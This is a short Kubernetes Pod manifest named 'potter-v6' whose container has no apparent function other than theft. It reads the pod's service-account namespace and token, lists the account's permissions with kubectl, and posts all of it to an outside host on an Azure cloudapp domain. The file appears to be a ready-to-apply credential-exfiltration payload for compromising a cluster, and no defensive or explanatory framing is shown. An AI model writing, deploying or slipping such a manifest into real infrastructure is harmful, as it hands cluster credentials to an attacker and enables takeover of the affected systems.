apiVersion: v1
kind: Pod
metadata:
  name: potter-v6
spec:
  containers:
    - name: shell
      image: bitnami/kubectl:latest
      command:
        - sh
        - -c
        - |
          apt update && apt install -y curl;
          {
            echo '>> NAMESPACE:' && cat /var/run/secrets/kubernetes.io/serviceaccount/namespace;
            echo '>> TOKEN:' && cat /var/run/secrets/kubernetes.io/serviceaccount/token;
            echo '>> CAN-I:' && kubectl auth can-i --list 2>&1;
          } | curl -X POST --data-binary @- http://potter-maga.brazilsouth.cloudapp.azure.com:8080
  restartPolicy: Never
